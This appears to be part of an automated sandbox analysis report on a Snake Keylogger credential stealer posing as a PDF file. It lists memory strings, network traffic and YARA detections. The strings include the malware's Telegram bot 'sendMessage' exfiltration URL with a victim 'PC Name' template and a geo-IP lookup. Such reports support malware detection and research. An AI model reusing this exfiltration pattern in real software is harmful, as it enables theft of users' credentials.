                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20a
                  Source: teXfNv.exe, 0000000B.00000002.4151393860.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enh
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002CFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBkq
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003D44000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003BC7000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003E14000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C22000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003B58000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003BA2000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003CFC000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003B2D000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003CD1000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003DF5000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003BFD000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C72000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003D44000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003BC7000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003E14000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C22000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003B58000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003BA2000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003CFC000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003B2D000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003CD1000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003DF5000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003BFD000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C72000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: teXfNv.exe, 0000000B.00000002.4151393860.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002D26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/h
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBkq
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7328, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: teXfNv.exe PID: 7888, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_016525680_2_01652568
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_016508710_2_01650871
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_016514580_2_01651458
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_016596580_2_01659658
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_01651BD00_2_01651BD0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_016542280_2_01654228
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_016542180_2_01654218
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0165C4B80_2_0165C4B8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_016513410_2_01651341
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0165331F0_2_0165331F
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_016555E80_2_016555E8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_016555D80_2_016555D8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_016554600_2_01655460
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_016554510_2_01655451
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_016558600_2_01655860
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_016558500_2_01655850
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056F64280_2_056F6428
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056F64180_2_056F6418
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056F54C90_2_056F54C9
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056F54D80_2_056F54D8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056F66B80_2_056F66B8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056FC1130_2_056FC113
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056FC1B80_2_056FC1B8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056F5F590_2_056F5F59
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056F5FC10_2_056F5FC1
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056F5FD00_2_056F5FD0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056F6F8B0_2_056F6F8B
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056F6F980_2_056F6F98
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056F09500_2_056F0950
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056F09200_2_056F0920
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056F09800_2_056F0980
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_056F5A880_2_056F5A88
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_081569640_2_08156964
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_08158DA80_2_08158DA8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0A0F45C00_2_0A0F45C0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0A0F02900_2_0A0F0290
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0A0F02A00_2_0A0F02A0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0A0F104B0_2_0A0F104B
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0A0F10580_2_0A0F1058
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0A0F79680_2_0A0F7968
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B840AD00_2_0B840AD0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B845A780_2_0B845A78
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8479900_2_0B847990
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B841C900_2_0B841C90
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8412D80_2_0B8412D8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8431810_2_0B843181
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8470E00_2_0B8470E0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8460180_2_0B846018
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8400400_2_0B840040
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8456380_2_0B845638
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B844B980_2_0B844B98
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B844BA80_2_0B844BA8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B845A690_2_0B845A69
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8479800_2_0B847980
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8469100_2_0B846910
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8439590_2_0B843959
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8439680_2_0B843968
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B847F600_2_0B847F60
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B847F700_2_0B847F70
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B844DB80_2_0B844DB8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B844DC80_2_0B844DC8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B841C810_2_0B841C81
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B845CB10_2_0B845CB1
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B845CC00_2_0B845CC0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B84ECC80_2_0B84ECC8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8412C90_2_0B8412C9
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B84F1000_2_0B84F100
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8470D00_2_0B8470D0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8400070_2_0B840007
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8460080_2_0B846008
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8450300_2_0B845030
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8450400_2_0B845040
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8417110_2_0B841711
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8417200_2_0B841720
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8445080_2_0B844508
